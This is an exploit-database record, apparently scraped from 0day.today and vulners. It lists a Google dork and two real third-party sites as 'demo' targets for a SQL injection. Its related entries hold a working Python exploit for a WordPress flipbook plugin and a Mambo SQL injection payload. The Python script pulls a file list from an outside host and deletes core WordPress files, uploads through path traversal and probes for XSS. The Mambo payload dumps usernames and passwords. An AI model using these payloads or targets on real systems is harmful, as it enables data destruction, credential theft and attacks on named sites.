ID 1337DAY-ID-19377
Type zdt
Reporter The Black Devils
Modified 2012-09-10T00:00:00
Description
Exploit for php platform in category web applications
# Exploit Title: Disqus sql injection Vulnerability
# Date: 08/09/2012
# Author: The Black Devils
# Home: 1337day Exploit DataBase 1337day.com
# Software Link: http://disqus.com/
# Category : [ webapps ]
# Google dork: intext:powered by disqus inurl:berita.php?id=
# Tested on: [Windows] & [Ubuntu]
-------------------------------
http:\Localhost\berita.php?id= [sql Injection]
-------------------------------
# Demo site:
http://obengware.com/news/index.php?id=%274397
http://www.riaupos.co/berita.php?act=full&id=%2716343
-------------------------------
#------------------
Contact:
https://www.facebook.com/DevilsDz
https://www.facebook.com/necesarios
#------------------
# 0day.today [2018-04-09] #
{"published": "2012-09-10T00:00:00", "id": "1337DAY-ID-19377", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T01:47:16", "bulletin": {"published": "2012-09-10T00:00:00", "id": "1337DAY-ID-19377", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 4.0, "modified": "2016-04-20T01:47:16", "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N/"}}, "hash": "084317be596b4b603cb329223c312c43eeb9a887d75ede9073e18acae5e18fce", "description": "Exploit for php platform in category web applications", "type": "zdt", "lastseen": "2016-04-20T01:47:16", "edition": 1, "title": "Disqus SQL Injection Vulnerability", "href": "http://0day.today/exploit/description/19377", "modified": "2012-09-10T00:00:00", "bulletinFamily": "exploit", "viewCount": 1, "cvelist": [], "sourceHref": "http://0day.today/exploit/19377", "references": [], "reporter": "The Black Devils", "sourceData": "# Exploit Title: Disqus sql injection Vulnerability\r\n# Date: 08/09/2012\r\n# Author: The Black Devils\r\n# Home: 1337day Exploit DataBase 1337day.com\r\n# Software Link: http://disqus.com/\r\n# Category : [ webapps ]\r\n# Google dork: intext:powered by disqus inurl:berita.php?id=\r\n# Tested on: [Windows] & [Ubuntu]\r\n\r\n-------------------------------\r\n\r\nhttp:\\Localhost\\berita.php?id= [sql Injection]\r\n-------------------------------\r\n# Demo site:\r\n\r\nhttp://obengware.com/news/index.php?id=%274397\r\nhttp://www.riaupos.co/berita.php?act=full&id=%2716343\r\n\r\n-------------------------------\r\n\r\n\r\n#------------------\r\nContact:\r\nhttps://www.facebook.com/DevilsDz\r\nhttps://www.facebook.com/necesarios\r\n#------------------\r\n\r\n\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "7be8ede9a10c397e5cd786c80e87a7a7", "key": "sourceData"}, {"hash": "c5093d855d713256cd4e13405252e5a4", "key": "published"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "af45deb26e8c23fcb3a01773d6d77b77", "key": "reporter"}, {"hash": "c5093d855d713256cd4e13405252e5a4", "key": "modified"}, {"hash": "7367b5207797e5c6dda73f468c7f9c49", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "80bd71d46f16d5290f9d9364ff02f911", "key": "sourceHref"}, {"hash": "cb93fa3a798f73fe75fbe92c50581b74", "key": "href"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}], "objectVersion": "1.0"}}], "description": "Exploit for php platform in category web applications", "hash": "0a1b1e6b930d640a31290d96091a95b6c0a6c10db9122be1f32e0180d3c1ab86", "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-25155"]}], "modified": "2018-04-09T07:45:51"}, "vulnersScore": 7.5}, "type": "zdt", "lastseen": "2018-04-09T07:45:51", "edition": 2, "title": "Disqus SQL Injection Vulnerability", "href": "https://0day.today/exploit/description/19377", "modified": "2012-09-10T00:00:00", "bulletinFamily": "exploit", "viewCount": 2, "cvelist": [], "sourceHref": "https://0day.today/exploit/19377", "references": [], "reporter": "The Black Devils", "sourceData": "# Exploit Title: Disqus sql injection Vulnerability\r\n# Date: 08/09/2012\r\n# Author: The Black Devils\r\n# Home: 1337day Exploit DataBase 1337day.com\r\n# Software Link: http://disqus.com/\r\n# Category : [ webapps ]\r\n# Google dork: intext:powered by disqus inurl:berita.php?id=\r\n# Tested on: [Windows] & [Ubuntu]\r\n\r\n-------------------------------\r\n\r\nhttp:\\Localhost\\berita.php?id= [sql Injection]\r\n-------------------------------\r\n# Demo site:\r\n\r\nhttp://obengware.com/news/index.php?id=%274397\r\nhttp://www.riaupos.co/berita.php?act=full&id=%2716343\r\n\r\n-------------------------------\r\n\r\n\r\n#------------------\r\nContact:\r\nhttps://www.facebook.com/DevilsDz\r\nhttps://www.facebook.com/necesarios\r\n#------------------\r\n\r\n\n\n# 0day.today [2018-04-09] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "2373484ff6344868260365bfc08e48d7", "key": "href"}, {"hash": "c5093d855d713256cd4e13405252e5a4", "key": "modified"}, {"hash": "c5093d855d713256cd4e13405252e5a4", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "af45deb26e8c23fcb3a01773d6d77b77", "key": "reporter"}, {"hash": "5f50d41783ac9cbd9f9a1e942dde7563", "key": "sourceData"}, {"hash": "a629b51835f6ca31ac417054a9918718", "key": "sourceHref"}, {"hash": "7367b5207797e5c6dda73f468c7f9c49", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"zdt": [{"lastseen": "2018-02-16T03:23:07", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2016-07-04T00:00:00", "published": "2016-07-04T00:00:00", "id": "1337DAY-ID-25155", "href": "https://0day.today/exploit/description/25155", "type": "zdt", "title": "WordPress Real3D FlipBook Plugin - Multiple Vulnerabilities", "sourceData": "#########################################################################\r\n# [+] [POC][Exploit] CodeCanyon Real3D FlipBook WordPress Plugin\r\n# [+] http://codecanyon.net/item/real3d-flipbook-wordpress-plugin/6942587\r\n# [+] Multiple Vulnerabilities Found by: Mukarram Khalid\r\n# [+] https://mukarramkhalid.com/wordpress-real-3d-flipbook-plugin-exploit/\r\n# [+] Requirements : Python 3.4.x or higher, Requests Module\r\n# [+] Timeline: Vuln Found : 01-07-2016, Reported to Vendor: 03-07-2016\r\n########################################################################\r\n \r\nimport os, json, base64\r\ntry:\r\n import requests\r\nexcept:\r\n exit('[-] Importing Requests module failed')\r\n \r\nclass wpFlipbook:\r\n ''' Wordpress 3d flipbook plugin exploit '''\r\n \r\n headers = {'User-agent' : 'Mozilla/11.0'}\r\n payload1 = {'deleteBook' : ''}\r\n payload2 = {'imgbase' : '', 'bookName' : '../../../', 'pageName' : 'makman'}\r\n payload3 = {'action' : 'delete', 'bookId' : '<script>alert(/makman/)</script>'}\r\n imageUrl = 'http://makman.tk/makman.jpg'\r\n wpFilesUrl = 'http://makman.tk/wpFiles.json'\r\n \r\n def __init__(self, url):\r\n url = url.rstrip('/')\r\n if 'http://' in url or 'https://' in url:\r\n self.url = url\r\n else:\r\n self.url = 'http://' + url\r\n \r\n def http(self, url, data = {}, post = False):\r\n try:\r\n if post:\r\n r = requests.post(url, data = data, headers = self.headers, timeout = 20)\r\n else:\r\n r = requests.get(url, params = data, headers = self.headers, timeout = 20)\r\n except:\r\n exit('[-] Something went wrong. Please check your internet connection')\r\n return r\r\n \r\n def deleteFiles(self):\r\n print('[+] Loading Wordpress file structure')\r\n r = self.http(self.wpFilesUrl)\r\n wpFiles = json.loads(r.text)\r\n print('[+] Wordpress File structure loaded successfully')\r\n print('[+] Creating directory real3dflipbook')\r\n r = self.http(self.url + '/wp-content/plugins/real3d-flipbook/includes/process.php', {'imgbase' : 'makman'}, True)\r\n print('[+] Deleting Files from wp-includes/ & wp-admin/')\r\n for wpFile in wpFiles['wpFiles']:\r\n print(' [+] Deleting File ' + wpFile)\r\n self.payload1['deleteBook'] = wpFile\r\n r = self.http(self.url + '/wp-content/plugins/real3d-flipbook/includes/process.php', self.payload1, True)\r\n print('[+] Files have been deleted successfully')\r\n \r\n def uploadImage(self):\r\n print('[+] Loading image file')\r\n r = self.http('http://makman.tk/makman.jpg')\r\n encodedImage = base64.b64encode(r.content)\r\n self.payload2['imgbase'] = ';,' + encodedImage.decode('utf-8')\r\n print('[+] Uploading image file in target root directory')\r\n r = self.http(self.url + '/wp-content/plugins/real3d-flipbook/includes/process.php', self.payload2, True)\r\n print('[+] Image has been uploaded here ' + self.url + '/' + self.payload2['pageName'] + '.jpg')\r\n \r\n def xss(self):\r\n print('[+] Checking XSS payload')\r\n r = self.http(self.url + '/wp-content/plugins/real3d-flipbook/includes/flipbooks.php', self.payload3)\r\n if self.payload3['bookId'] in r.text:\r\n print('[+] Found XSS here :')\r\n print(' [+] ' + self.url + '/wp-content/plugins/real3d-flipbook/includes/flipbooks.php?action=' + self.payload3['action'] + '&bookId=' + self.payload3['bookId'])\r\n \r\n#########################################################################################################\r\n \r\ndef banner():\r\n os.system('cls' if os.name == 'nt' else 'clear')\r\n tabs = ' '\r\n print(tabs + '*******************************************************************')\r\n print(tabs + '* [+] [POC][Exploit] CodeCanyon Real3D FlipBook WordPress Plugin *')\r\n print(tabs + '* [+] Multiple Vulnerabilities Found by: *')\r\n print(tabs + '* [+] https://mukarramkhalid.com *')\r\n print(tabs + '*******************************************************************\\n\\n')\r\n \r\ndef main():\r\n banner()\r\n url = input('[+] Enter Url\\n[+] E.g. http://server or http://server/wordpress\\n[+] ')\r\n exploit = wpFlipbook(url)\r\n exploit.deleteFiles()\r\n exploit.uploadImage()\r\n exploit.xss()\r\n print('[+] Done')\r\n \r\nif __name__ == '__main__':\r\n try:\r\n main()\r\n except KeyboardInterrupt:\r\n exit('\\n[-] CTRL-C detected.\\n')\r\n# End\n\n# 0day.today [2018-02-16] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/25155"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:25", "bulletinFamily": "software", "description": "Aria-Security Team (Persian Security Network)\r\nhttp://Aria-Security.Net/\r\n----------------------------\r\nShoutz: Aura, NULL, Kinglet, iM4N, Imm02tal\r\nMambo Components ensenanzas "id" Remote SQL Injection\r\nOriginal Advisory: http://forum.aria-security.net/showthread.php?p=1731\r\n\r\n\r\nindex.php?option=com_ensenanzas&Itemid=71&id=99999/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*\r\n\r\n\r\n\r\nRegards,\r\nThe-0utl4w", "modified": "2008-03-11T00:00:00", "published": "2008-03-11T00:00:00", "id": "SECURITYVULNS:DOC:19377", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:19377", "title": "Mambo Components ensenanzas "id" Remote SQL Injection", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}
